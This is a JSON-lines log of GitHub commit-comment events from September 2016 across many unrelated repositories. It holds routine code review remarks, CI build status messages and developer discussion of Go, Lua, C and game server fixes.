{"id":"4610643385","type":"CommitCommentEvent","actor":{"login":"MustafaMustafa"},"repo":{"name":"rnc-lbl/star-picoDst"},"payload":{"comment":{"id":19152168,"position":19,"line":66,"path":"StPicoDstMaker/StPicoDstMaker.cxx","commit_id":"21871d25082648d3de1350325fb65b9aa7c920ae","created_at":"2016-09-23T20:08:40Z","updated_at":"2016-09-23T20:08:40Z","body":"This is a serious change of code behavior in a cosmetics commit! Why?"}},"created_at":"2016-09-23T20:08:40Z"}
{"id":"4610644072","type":"CommitCommentEvent","actor":{"login":"afragen"},"repo":{"name":"afragen/github-updater"},"payload":{"comment":{"id":19152169,"position":null,"line":null,"path":null,"commit_id":"1b422c1f4f5309ec83183a8ea90f80ab9d1dad85","created_at":"2016-09-23T20:08:50Z","updated_at":"2016-09-23T20:08:50Z","body":"The error was really in the `class PAnD` or rather in the file. I wrote in an early exit during heartbeat and this was causing the issues. \r\n\r\nThe above code does mitigate this but not in the best way. At least now I know why it was occurring. Thanks for the bug report."}},"created_at":"2016-09-23T20:08:50Z"}
{"id":"4610648985","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19152189,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-23T20:09:53Z","updated_at":"2016-09-23T20:09:53Z","body":"Look at lines 98 down in both versions. Why does my in-order traversal work\nwhen I am simply printing out values <https://play.golang.org/p/2jxOtM-ApW>,\nbut not when I try to populate a slice\n<https://play.golang.org/p/aVEn8POqhl>? (Note that in the slice version, it\npopulates the correct number of values (3), but it thinks they are all nil!)\n\nThanks,\n\nOn Fri, Sep 23, 2016 at 1:31 AM, Joe Tsai <notifications@github.com> wrote:\n\n> The iterator pattern is one that is common to Java and Python. Go has\n> iterators too; you've probably used them before:\n>\n> for k, v := range m { ... }\n>\n> Currently, Go does not allow you to define your own type that can be\n> ranged over. Any attempt at adding Generics to Go will probably need to\n> find some way for arbitrary user-defined types to satisfy some type of\n> Ranger interface or something.\n>\n> That being said, it's not hard to define your own iterator-like\n> functionality in your data structure, and it is totally fine (and often\n> useful) to do. One way to do it is the following:\n>\n> // IterByDFS returns a iterator callback that iterates over the BinaryTree// in a depth-first manner. The callback returns nil when it is done iterating.func (bt *BinaryTree) IterByDFS() func() *Item { ... }\n>\n> Usage:\n>\n> iter := bt.IterByDFS()for v := iter(); v != nil; v = iter() {\n>     // Logic here.\n> }\n>\n> This is just one pattern I came up with. There are many other approaches.\n> The fact that there are many approaches is also one reason that it's hard\n> coming up with a unified language-level construct for iterators.\n>\n> Example of iterator-like patterns in production code:\n>\n>    - github.com/boltdb/bolt.Bucket.Cursor\n>    <https://godoc.org/github.com/boltdb/bolt#Bucket.Cursor>\n>    - container/list <https://golang.org/pkg/container/list/> - see\n>    example in overview.\n>\n> Also - what is the difference between iterating and recursion (for\n> traversing a DS)?\n> They are separate concepts. I would say that the connection occurs because\n> iterating over a DS often involves recursion (but not always). For example,\n> iterating over a slice is done with a simple for loop.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19141580>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib11uOLUFDQFEqKNAgQKqGnYtFT_clks5qs3JcgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-23T20:09:53Z"}
{"id":"4610650989","type":"CommitCommentEvent","actor":{"login":"ahoneybun"},"repo":{"name":"system76/docs"},"payload":{"comment":{"id":19152194,"position":null,"line":null,"path":null,"commit_id":"d0121db5ed8c6b9a1d639bc1e8f83ebc7c36ba45","created_at":"2016-09-23T20:10:19Z","updated_at":"2016-09-23T20:10:19Z","body":"Cool! If you need any help with KDE stuff let me know lol."}},"created_at":"2016-09-23T20:10:19Z"}
{"id":"4610654299","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152208,"position":null,"line":null,"path":null,"commit_id":"9b8bfe3892936db03d3ffc53973b745717d77e53","created_at":"2016-09-23T20:11:01Z","updated_at":"2016-09-23T20:11:01Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 263](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1227&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 1 (new)) Build time: 00:13:10"}},"created_at":"2016-09-23T20:11:01Z"}
{"id":"4610654520","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152210,"position":null,"line":null,"path":null,"commit_id":"d06d15e6774468809a3e76a0f6a8602072bb64bc","created_at":"2016-09-23T20:11:04Z","updated_at":"2016-09-23T20:11:04Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 264](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1228&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T20:11:04Z"}
{"id":"4610655051","type":"CommitCommentEvent","actor":{"login":"Overtonesinger"},"repo":{"name":"Overtonesinger/xmlseclibs"},"payload":{"comment":{"id":19152212,"position":null,"line":null,"path":null,"commit_id":"d3aff88ebf212a22046635740086a12f3d38597c","created_at":"2016-09-23T20:11:11Z","updated_at":"2016-09-23T20:11:11Z","body":"@thijzert Thanx.  IF ONLY there was some easy way how to merge pull-reqs from other branches into my own fork directly on Github **website**!\r\n(To execute those commands, I would have to first: generate a new git TOKEN for my new virtual-host AND then configure git credentials on my new virtual-host. It is extremely un-easy for me.)"}},"created_at":"2016-09-23T20:11:11Z"}
{"id":"4610656407","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152217,"position":null,"line":null,"path":null,"commit_id":"d06d15e6774468809a3e76a0f6a8602072bb64bc","created_at":"2016-09-23T20:11:28Z","updated_at":"2016-09-23T20:11:28Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 264](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1228&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:25"}},"created_at":"2016-09-23T20:11:28Z"}
{"id":"4610656540","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152219,"position":null,"line":null,"path":null,"commit_id":"de349f34e0b098dd25c58ad21d94d12ac331e021","created_at":"2016-09-23T20:11:30Z","updated_at":"2016-09-23T20:11:30Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 265](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1229&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T20:11:30Z"}
{"id":"4610657743","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152228,"position":null,"line":null,"path":null,"commit_id":"de349f34e0b098dd25c58ad21d94d12ac331e021","created_at":"2016-09-23T20:11:47Z","updated_at":"2016-09-23T20:11:47Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 265](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1229&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:16"}},"created_at":"2016-09-23T20:11:47Z"}
{"id":"4610657748","type":"CommitCommentEvent","actor":{"login":"triska"},"repo":{"name":"JCumin/Brachylog"},"payload":{"comment":{"id":19152229,"position":null,"line":null,"path":null,"commit_id":"7bfb10abeacfa3fee25d51c291b0a444f7c49415","created_at":"2016-09-23T20:11:47Z","updated_at":"2016-09-23T20:11:47Z","body":"You can omit the `!/0` in this commit: If you write `( Goal -> true ; Else )`, then, if `Goal` succeeds, `Else` will not be considered.\r\n\r\nHowever, the best way to distinguish cases with CLP(FD) constraints is to use `compare/3`: You can say `zcompare(C, N, 2)` and then use separate clauses for `check_prime(=, ....)` and `check_prime(>, ...)`, which apply, respectively, if `N` is equal to&nbsp;2 or greater than&nbsp;2.\r\n\r\nThe advantage of writing it with pure clauses is that you retain the full generality of relations: Even if you currently need only one direction, where `N` is already known, it is useful to make the other cases work too. Maybe not in this very particular case, but in the future.\r\n\r\nKeep up your great work on Brachylog, I am following these developments with great interest!"}},"created_at":"2016-09-23T20:11:47Z"}
{"id":"4610657977","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152230,"position":null,"line":null,"path":null,"commit_id":"de349f34e0b098dd25c58ad21d94d12ac331e021","created_at":"2016-09-23T20:11:49Z","updated_at":"2016-09-23T20:11:49Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 266](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1230&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T20:11:49Z"}
{"id":"4610658881","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152237,"position":null,"line":null,"path":null,"commit_id":"de349f34e0b098dd25c58ad21d94d12ac331e021","created_at":"2016-09-23T20:12:01Z","updated_at":"2016-09-23T20:12:01Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 266](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1230&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:11"}},"created_at":"2016-09-23T20:12:01Z"}
{"id":"4610659024","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152239,"position":null,"line":null,"path":null,"commit_id":"de349f34e0b098dd25c58ad21d94d12ac331e021","created_at":"2016-09-23T20:12:03Z","updated_at":"2016-09-23T20:12:03Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 267](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1231&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T20:12:03Z"}
{"id":"4610660067","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152245,"position":null,"line":null,"path":null,"commit_id":"de349f34e0b098dd25c58ad21d94d12ac331e021","created_at":"2016-09-23T20:12:16Z","updated_at":"2016-09-23T20:12:16Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 267](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1231&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:12"}},"created_at":"2016-09-23T20:12:16Z"}
{"id":"4610664399","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":19152261,"position":null,"line":null,"path":null,"commit_id":"d45378bc61798942928f147d3d3205c40442559b","created_at":"2016-09-23T20:13:10Z","updated_at":"2016-09-23T20:13:10Z","body":"🎉 "}},"created_at":"2016-09-23T20:13:10Z"}
{"id":"4610665857","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19152267,"position":null,"line":null,"path":null,"commit_id":"f7fd3697c51c65df99e1d25f1c407dc5786d33c8","created_at":"2016-09-23T20:13:28Z","updated_at":"2016-09-23T20:13:28Z","body":"Ah exactly, I stop the test and redo it next week, thank you for checking it!"}},"created_at":"2016-09-23T20:13:28Z"}
{"id":"4610665896","type":"CommitCommentEvent","actor":{"login":"Lunatixz"},"repo":{"name":"im85288/script.tvguide.dvr"},"payload":{"comment":{"id":19152268,"position":null,"line":null,"path":null,"commit_id":"59b54f1bcfc9f28bf71d30f30745a5aa0c65c682","created_at":"2016-09-23T20:13:29Z","updated_at":"2016-09-23T20:13:29Z","body":"LOL... war, heh Honestly I don't care what you do with twinther tvguide. I just didn't know you were a plagiarizer, its duly noted. It would have been nice to be credit for the work I did... that's all."}},"created_at":"2016-09-23T20:13:29Z"}
{"id":"4610667199","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19152270,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-23T20:13:45Z","updated_at":"2016-09-23T20:13:45Z","body":"And why are we encrypting the header?\n\nThe spec says it's optional, and otrv3 sends similar information in an\nunencrypted header.\n\nEm 23/09/2016 15:04, \"Fab Torchz\" <notifications@github.com> escreveu:\n\n> We are actually still considering this, I haven't see enough reason to\n> contain the PNs.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/twstrike/otrv4/commit/d188bf58842e839a856f9427f32c6fbbd7748648#commitcomment-19152116>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAB4WRB7UCHJWenncPeAo3uvnfIAnFhfks5qtDDjgaJpZM4KDYWC>\n> .\n>\n"}},"created_at":"2016-09-23T20:13:45Z"}
{"id":"4610668765","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19152273,"position":null,"line":null,"path":null,"commit_id":"b0689499ba619e897573376e1b32648c7636aeca","created_at":"2016-09-23T20:14:05Z","updated_at":"2016-09-23T20:14:05Z","body":"В основном пока что только косметические исправления. В части 2 будут уже исправления заданий.\r\nBasically, so far only cosmetic fixes. Part 2 will have quest fixes."}},"created_at":"2016-09-23T20:14:05Z"}
{"id":"4610672650","type":"CommitCommentEvent","actor":{"login":"Denzed"},"repo":{"name":"Denzed/auOS"},"payload":{"comment":{"id":19152283,"position":null,"line":null,"path":null,"commit_id":"7801e1bed9ea10bdf8484745ec2bc09f15dd5f43","created_at":"2016-09-23T20:14:52Z","updated_at":"2016-09-23T20:14:52Z","body":"Forgot to add that now interrupt_handler also has information from data registers corresponding to the point of interrupt"}},"created_at":"2016-09-23T20:14:52Z"}
{"id":"4610674393","type":"CommitCommentEvent","actor":{"login":"radleyrigonan"},"repo":{"name":"radleyrigonan/dosenet-analysis"},"payload":{"comment":{"id":19152289,"position":null,"line":null,"path":null,"commit_id":"b4449452a79565b35e939b2344748dedd83c8088","created_at":"2016-09-23T20:15:14Z","updated_at":"2016-09-23T20:15:14Z","body":"Oops, I was using a 79 consecutive aaaaa as a reference to the character limit."}},"created_at":"2016-09-23T20:15:14Z"}
{"id":"4610674699","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19152290,"position":null,"line":null,"path":null,"commit_id":"b0689499ba619e897573376e1b32648c7636aeca","created_at":"2016-09-23T20:15:18Z","updated_at":"2016-09-23T20:15:18Z","body":"Косметические исправления описывать не буду. Вы сами их увидите.\r\nCosmetic fixes will not describe. You yourself see them."}},"created_at":"2016-09-23T20:15:18Z"}
{"id":"4610679017","type":"CommitCommentEvent","actor":{"login":"paramountgroup"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19152300,"position":null,"line":null,"path":null,"commit_id":"387971be04f57f04e175ebaaa836f2947232bff2","created_at":"2016-09-23T20:16:13Z","updated_at":"2016-09-23T20:16:13Z","body":"Thanks @wegazi & @genie137  I took pieces from both of your solutions to make mine work and look like the lesson. Here are the lines that are missing from the lesson:\r\n\r\n<RelativeLayout xmlns:android=\"http://schemas.android.com/apk/res/android\" \r\n\r\nas seen in @genie137's  code \r\n\r\nand @wegazi  placed the missing image view the same as she did in the lesson\r\n\r\n<ImageView\r\n    android:layout_width=\"24dp\"\r\n    android:layout_height=\"24dp\"\r\n    android:layout_alignParentRight=\"true\"\r\n    android:layout_centerVertical=\"true\"\r\n    android:layout_marginRight=\"16dp\"\r\n    android:src=\"@drawable/ic_play_arrow\" />\r\n\r\nAlso watch the name the you call the image for the play arrow. I left mine as\r\nandroid:src=\"@drawable/ic_play_arrow_white_24dp\"\r\n\r\n"}},"created_at":"2016-09-23T20:16:13Z"}
{"id":"4610680967","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"CenterForOpenScience/osf-models"},"payload":{"comment":{"id":19152305,"position":52,"line":904,"path":"osf_models/models/sanctions.py","commit_id":"f2645987cb778656ad7358b6244d8c173bf374bb","created_at":"2016-09-23T20:16:41Z","updated_at":"2016-09-23T20:16:41Z","body":"This should be removed."}},"created_at":"2016-09-23T20:16:41Z"}
{"id":"4610682185","type":"CommitCommentEvent","actor":{"login":"tawheeler"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19152310,"position":null,"line":null,"path":null,"commit_id":"dfcbf55a9ab7caa02b05175f6ac413646dbee953","created_at":"2016-09-23T20:16:57Z","updated_at":"2016-09-23T20:16:57Z","body":"right"}},"created_at":"2016-09-23T20:16:57Z"}
{"id":"4610683277","type":"CommitCommentEvent","actor":{"login":"codetricity"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19152313,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-23T20:17:11Z","updated_at":"2016-09-23T20:17:11Z","body":"Man, you're great. Yes, it was only for a specific hackathon at TechCrunch Disrupt SF, which was in 2015 Oct. You should take all credit for the work you're doing. I'd like to showcase your work here:  http://theta360.guide/\r\n\r\nIf you want to create a new master repository under your account, I'll fork it from theta360dev and my account and see if we can get the community to help add the missing options. Also, the original code was from NCTech and we prepped it for a hackathon. It didn't support the RICOH options, so we actually decided to use real cameras. I've been thinking of adding the options for a long time."}},"created_at":"2016-09-23T20:17:11Z"}
{"id":"4610685163","type":"CommitCommentEvent","actor":{"login":"im85288"},"repo":{"name":"im85288/script.tvguide.dvr"},"payload":{"comment":{"id":19152318,"position":null,"line":null,"path":null,"commit_id":"59b54f1bcfc9f28bf71d30f30745a5aa0c65c682","created_at":"2016-09-23T20:17:32Z","updated_at":"2016-09-23T20:17:32Z","body":"No worries mate all good. I honesty don't give a shit either! All fun, enjoy your evening. "}},"created_at":"2016-09-23T20:17:32Z"}
{"id":"4610687943","type":"CommitCommentEvent","actor":{"login":"chneukirchen"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19152325,"position":null,"line":null,"path":null,"commit_id":"397538a7e11d784e49e224250e0f353dcf51ba08","created_at":"2016-09-23T20:18:08Z","updated_at":"2016-09-23T20:18:08Z","body":"Just remove the `<asm/page.h>` completely, its for Linux 2.0(!).\r\n\r\nGood catch with the mmap, that's where I was stuck."}},"created_at":"2016-09-23T20:18:08Z"}
{"id":"4610693657","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19152335,"position":null,"line":null,"path":null,"commit_id":"b0689499ba619e897573376e1b32648c7636aeca","created_at":"2016-09-23T20:19:22Z","updated_at":"2016-09-23T20:19:22Z","body":"@Mysterium ,try fix all Start zones, Gobins and Worgens too ( choose what you want). We need DB Quests fix Rush ( It must be playeble). Anyway you can make your own fix plan and place it inside TODO in repo.\r\n@alexkulya , уважаю)))) respect))))"}},"created_at":"2016-09-23T20:19:22Z"}
{"id":"4610693814","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19152336,"position":28,"line":261,"path":"profiles/car.lua","commit_id":"f948fb081b50c922969da5b1564b787781409ffa","created_at":"2016-09-23T20:19:24Z","updated_at":"2016-09-23T20:19:24Z","body":"No action needed, but FYI nonetheless: The `gmatch`  iterator is not something that has been used in the profiles until now. I found the commit while looking through known bugs in lua and searching for the usage of `gmatch` which is apparently buggy in some versions of lua: https://www.lua.org/bugs.html"}},"created_at":"2016-09-23T20:19:24Z"}
{"id":"4610695051","type":"CommitCommentEvent","actor":{"login":"dharvey-consbio"},"repo":{"name":"consbio/tablo"},"payload":{"comment":{"id":19152342,"position":7,"line":248,"path":"tablo/models.py","commit_id":"fb287005b07a19dbd6d4f1ad42d7b75e4fc59ff6","created_at":"2016-09-23T20:19:40Z","updated_at":"2016-09-23T20:19:40Z","body":"This could be a generator expression:\r\n```python\r\n        for field in (f.strip() for f in kwargs.get('order_by_fields') or ''):\r\n```"}},"created_at":"2016-09-23T20:19:40Z"}
{"id":"4610695900","type":"CommitCommentEvent","actor":{"login":"bergholdt"},"repo":{"name":"metricfu/metric_fu"},"payload":{"comment":{"id":19152345,"position":5,"line":4,"path":"Gemfile","commit_id":"68aa5db8ba549ab9af6c3bee45e817ca028280a4","created_at":"2016-09-23T20:19:51Z","updated_at":"2016-09-23T20:19:51Z","body":"@jkeam why not for RUBY_VERSION newer then 2.2.1?\r\nNewest is 2.2.5 and what about 2.3.1?\r\n\r\nCould it be changed to something like\r\n```\r\nif Gem::Dependency.new('', '~> 2.1').match?('', RUBY_VERSION)\r\n```"}},"created_at":"2016-09-23T20:19:51Z"}
{"id":"4610696276","type":"CommitCommentEvent","actor":{"login":"burkaygur"},"repo":{"name":"inspirit/jsfeat"},"payload":{"comment":{"id":19152346,"position":null,"line":null,"path":null,"commit_id":"b946e3fb6f4a00c65a75f0be204c7965b4289d4c","created_at":"2016-09-23T20:19:56Z","updated_at":"2016-09-23T20:19:56Z","body":"Hi @charleslaw! Is the implementation correct? I keep getting 1 or 2 for the theta. No values in between."}},"created_at":"2016-09-23T20:19:56Z"}
{"id":"4610698424","type":"CommitCommentEvent","actor":{"login":"ke4roh"},"repo":{"name":"ke4roh/CitycampNC2016"},"payload":{"comment":{"id":19152348,"position":null,"line":null,"path":null,"commit_id":"34136a04e21a5ec6b53dde4189106c4b2e9780cc","created_at":"2016-09-23T20:20:22Z","updated_at":"2016-09-23T20:20:22Z","body":"This is the best!"}},"created_at":"2016-09-23T20:20:22Z"}
{"id":"4610699356","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19152350,"position":null,"line":null,"path":null,"commit_id":"03fb04c7a0804f20581dea4c71ac1c6a8838d670","created_at":"2016-09-23T20:20:33Z","updated_at":"2016-09-23T20:20:33Z","body":"I'm not sure about it because in this case you have to move template variable names (like `mainAction`, `idleAction`, and `consumer`) to `DeclarationsProvider`. In case of renaming, you have to remember that it should be renamed in both template and `DeclarationsProvider`."}},"created_at":"2016-09-23T20:20:33Z"}
{"id":"4610701330","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19152354,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-23T20:21:00Z","updated_at":"2016-09-23T20:21:00Z","body":"The reason is that the slice passed into `Traverse` is copied by value. That is, it is copying the slice value, which is implemented under the hood as:\r\n```go\r\ntype Slice struct {\r\n    Data unsafe.Pointer\r\n    Len int\r\n    Cap int\r\n}\r\n```\r\n\r\nWhen you append to the slice in `Traverse`, it may mutate the `Data`, `Len`, `Cap` fields of the local copy. The problem is that the slice defined in `InOrder` never sees these updates.\r\n\r\nPossible solutions:\r\n* Have `Traverse` also return the newly mutated slice\r\n* Pass in a pointer to the slice in `Traverse`\r\n* Rather than having `Traverse` append to the slice, it assumes that the slice is large enough and simply assigns to each slot starting from the first one. Have `Traverse` return the number of elements written. This is similar to the pattern that `io.Reader` uses.\r\n\r\nP.S. On L92, You probably wanted to use `make([]Value, 0, tree.size)` instead of `make([]Value, tree.size)` if you plan on appending to the slice in subsequent steps.\r\n"}},"created_at":"2016-09-23T20:21:00Z"}
{"id":"4610709057","type":"CommitCommentEvent","actor":{"login":"vpatryshev"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19152373,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-23T20:22:39Z","updated_at":"2016-09-23T20:22:39Z","body":"Now I see it; thanks.\n\nMichal, I do not fully understand the way things are being done; all in\nparallel? What about my pr that was sent 3 weeks ago?\n\nThese changes look cool and impressive, of course (mostly); and they are\nabsolutely incompatible with what I was doing. I would definitely prefer\nsome coordination; we could have worked together on all this.\n\nI could write some comments in that pr, but not sure yet if anybody wants\nthem.\n\n\n\nThanks,\n-Vlad\n\nOn Fri, Sep 23, 2016 at 10:54 AM, Michal Malohlava <notifications@github.com\n> wrote:\n\n> Vlad, did you see: https://github.com/h2oai/sparkling-water/compare/JH_SW-\n> 178 ? It is larger change implemented in this branch.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/h2oai/sparkling-water/commit/cd3673c5b15a9e9f487d56044c30437acb9f5f51#commitcomment-19150286>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOuK7m0evJJmx8KBWGc_aOHSNTMNi8Wks5qtBJUgaJpZM4KE6Wt>\n> .\n>\n"}},"created_at":"2016-09-23T20:22:39Z"}
{"id":"4610709697","type":"CommitCommentEvent","actor":{"login":"nad"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19152378,"position":6,"line":137,"path":"src/full/Agda/Interaction/BasicOps.hs","commit_id":"157e274146fbe1c03886d252bf3ad83e2dbeca13","created_at":"2016-09-23T20:22:49Z","updated_at":"2016-09-23T20:22:49Z","body":"Did you intend to use `vfull` anywhere?"}},"created_at":"2016-09-23T20:22:49Z"}
{"id":"4610712514","type":"CommitCommentEvent","actor":{"login":"Lunatixz"},"repo":{"name":"im85288/script.tvguide.dvr"},"payload":{"comment":{"id":19152390,"position":null,"line":null,"path":null,"commit_id":"59b54f1bcfc9f28bf71d30f30745a5aa0c65c682","created_at":"2016-09-23T20:23:24Z","updated_at":"2016-09-23T20:23:24Z","body":"In all seriousness, If you want to use it... that's fine. Just a matter of passing respect along... Good luck with your project."}},"created_at":"2016-09-23T20:23:24Z"}
{"id":"4610712586","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152391,"position":110,"line":110,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T20:23:25Z","updated_at":"2016-09-23T20:23:25Z","body":"Honestly, I do not trust not explicit casts. I can put a comment to clarify it."}},"created_at":"2016-09-23T20:23:25Z"}
{"id":"4610713589","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"ajkeller34/Unitful.jl"},"payload":{"comment":{"id":19152394,"position":7,"line":8,"path":".travis.yml","commit_id":"34085a079f619d84ee1ab2250377a406c9942fd6","created_at":"2016-09-23T20:23:36Z","updated_at":"2016-09-23T20:23:36Z","body":"you can make this an allowed failure so it will still run but not make your status red"}},"created_at":"2016-09-23T20:23:36Z"}
{"id":"4610720570","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152409,"position":113,"line":113,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T20:25:04Z","updated_at":"2016-09-23T20:25:04Z","body":"Again, doing not cast arithmetics seems fishy. Usually, compilers warn about this stuff."}},"created_at":"2016-09-23T20:25:04Z"}
{"id":"4610722003","type":"CommitCommentEvent","actor":{"login":"dhirajsb"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19152411,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T20:25:21Z","updated_at":"2016-09-23T20:25:21Z","body":"If there is a connect error after handshake succeeds, CometD has inbuilt ability to retry handshake. There is a caveat though that the CometD server should permit it. If Salesforce advises not to reconnect, then it's a potential problem and will have to be handled in the code. \r\n\r\nBut if it does the right thing and permits it, CometD will handle that, outside the component's client reconnect logic, which only handles handshake failures that CometD cannot handle. \r\n\r\nCometD client has back off and max back off options for controlling it's connect retries, but they are not exposed from the Salesforce component at the moment. That enhancement can be done if there is a compelling need for it. "}},"created_at":"2016-09-23T20:25:21Z"}
{"id":"4610723812","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152414,"position":null,"line":null,"path":null,"commit_id":"01dbfc8151e55d1942df00bed5048f64a454a3ea","created_at":"2016-09-23T20:25:44Z","updated_at":"2016-09-23T20:25:44Z","body":"Also see [Issue 303: Add TestScripts directory; move test fodder into it](http://github.com/weidai11/cryptopp/issues/303)."}},"created_at":"2016-09-23T20:25:44Z"}
